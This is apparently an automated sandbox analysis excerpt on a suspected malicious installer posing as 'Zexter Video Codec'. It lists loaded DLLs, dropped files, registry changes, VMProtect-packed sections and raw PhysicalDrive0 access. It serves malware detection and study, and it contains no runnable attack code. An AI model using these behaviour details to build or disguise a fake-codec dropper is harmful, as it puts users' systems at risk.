        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: textinputframework.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: coreuicomponents.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: shfolder.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: rstrtmgr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: msacm32.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: textshaping.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: riched20.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: usp10.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: msls31.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: explorerframe.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: sfc.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: dsound.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: powrprof.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: umpdc.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: appxsip.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: opcservices.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Window found: window name: TMainForm
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Zexter Video Codec_is1
        Source: L9rm7AX4mp.exe | Static file information: File size 8333974 > 1048576
        Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: L9rm7AX4mp.tmp, 00000001.00000002.3288367581.0000000002383000.00000002.00000001.01000000.00000006.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039453112.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039392721.000000000209C000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287918641.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, _isdecmp.dll.1.dr

        Data Obfuscation

        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Unpacked PE file: 3.2.zextervideocodec32_64.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Unpacked PE file: 3.2.zextervideocodec32_64.exe.400000.0.unpack
        Source: is-JTN8Q.tmp.1.dr | Static PE information: 0x6C5714D0 [Sat Aug 7 13:44:48 2027 UTC]
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502AC
        Source: is-JTN8Q.tmp.1.dr | Static PE information: section name: /4
        Source: is-BA0AN.tmp.1.dr | Static PE information: section name: /4
        Source: is-MJPNF.tmp.1.dr | Static PE information: section name: /4
        Source: is-2DT7G.tmp.1.dr | Static PE information: section name: /4
        Source: is-MMD8V.tmp.1.dr | Static PE information: section name: /4
        Source: is-TNU6F.tmp.1.dr | Static PE information: section name: /4
        Source: is-4GU98.tmp.1.dr | Static PE information: section name: /4
        Source: is-6S03E.tmp.1.dr | Static PE information: section name: /4
        Source: is-6DO3I.tmp.1.dr | Static PE information: section name: /4
        Source: is-7G2MG.tmp.1.dr | Static PE information: section name: /4
        Source: is-65SGC.tmp.1.dr | Static PE information: section name: /4
        Source: is-I8TQ0.tmp.1.dr | Static PE information: section name: /4
        Source: is-OMDJC.tmp.1.dr | Static PE information: section name: /4
        Source: is-H2J0H.tmp.1.dr | Static PE information: section name: /4
        Source: is-D169I.tmp.1.dr | Static PE information: section name: /4
        Source: is-MI7QU.tmp.1.dr | Static PE information: section name: /4
        Source: is-4BT74.tmp.1.dr | Static PE information: section name: /4
        Source: is-MVKEA.tmp.1.dr | Static PE information: section name: /4
        Source: is-ILE5I.tmp.1.dr | Static PE information: section name: /4
        Source: is-2TIQ1.tmp.1.dr | Static PE information: section name: /4
        Source: is-PM61J.tmp.1.dr | Static PE information: section name: /4
        Source: is-O9QDL.tmp.1.dr | Static PE information: section name: /4
        Source: is-FLD95.tmp.1.dr | Static PE information: section name: /4
        Source: is-S5KF0.tmp.1.dr | Static PE information: section name: /4
        Source: is-QACPG.tmp.1.dr | Static PE information: section name: /4
        Source: is-4PKG7.tmp.1.dr | Static PE information: section name: /4
        Source: is-G59D3.tmp.1.dr | Static PE information: section name: /4
        Source: is-9G1LK.tmp.1.dr | Static PE information: section name: /4
        Source: is-MOHPK.tmp.1.dr | Static PE information: section name: /4
        Source: is-61SBR.tmp.1.dr | Static PE information: section name: /4
        Source: is-FGQU3.tmp.1.dr | Static PE information: section name: /4
        Source: is-4SCDL.tmp.1.dr | Static PE information: section name: /4
        Source: is-OCNI8.tmp.1.dr | Static PE information: section name: /4
        Source: is-4L8QF.tmp.1.dr | Static PE information: section name: /4
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Code function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00409954 push 00409991h; ret 1_2_00409989
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0040A04F push ds; ret 1_2_0040A050
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0040A023 push ds; ret 1_2_0040A04D
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00460088 push ecx; mov dword ptr [esp], ecx 1_2_0046008C
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax 1_2_004062CD
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0049467C push ecx; mov dword ptr [esp], ecx 1_2_00494681
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx 1_2_004106E5
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx 1_2_0040D03A
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004850AC push ecx; mov dword ptr [esp], ecx 1_2_004850B1
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00443450 push ecx; mov dword ptr [esp], ecx 1_2_00443454
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0040546D push eax; ret 1_2_004054A9
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx 1_2_0040F59A
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00459634 push 00459678h; ret 1_2_00459670
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0040563B push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004517E4 push 00451817h; ret 1_2_0045180F
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004519A8 push ecx; mov dword ptr [esp], eax 1_2_004519AD
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00483A08 push 00483AF7h; ret 1_2_00483AEF
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00477A24 push ecx; mov dword ptr [esp], edx 1_2_00477A25

        Persistence and Installation Behavior

        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_00401A4F
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_02BCF879
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-4BT74.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-OCNI8.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-MJPNF.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\liblcms2-2.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libpangomm-1.4-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-I8TQ0.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-6S03E.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-G59D3.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-6DO3I.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libpangoft2-1.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libjpeg-8.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-FGQU3.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libstdc++-6.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libgdk-win32-2.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-4L8QF.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-65SGC.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-H2J0H.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libgobject-2.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-O9QDL.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libgcc_s_dw2-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\uninstall\unins000.exe (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-D169I.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-4GU98.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\liblzma-5.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libxml2-2.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libintl-8.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-QACPG.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-4SCDL.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-BA0AN.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libfreetype-6.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libglibmm-2.4-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libsigc-2.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-9G1LK.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-MOHPK.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-OMDJC.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-7G2MG.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libtiff-5.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libharfbuzz-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_RegDLL.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_setup64.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-61SBR.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libglib-2.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libiconv-2.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libgomp-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-FLD95.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-MVKEA.tmp
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | File created: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-MMD8V.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libgdk_pixbuf-2.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\librsvg-2-2.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-ILE5I.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libwinpthread-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libgio-2.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libpng16-16.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-S5KF0.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libpangocairo-1.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_iscrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libpango-1.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libgiomm-2.4-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_isdecmp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-2TIQ1.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\zlib1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\uninstall\is-1611L.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libgraphite2.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-4PKG7.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libpixman-1-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-MI7QU.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-2DT7G.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libpcre-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-JTN8Q.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-TNU6F.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libpangowin32-1.0-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_shfoldr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\is-PM61J.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libgdkmm-2.4-1.dll (copy)
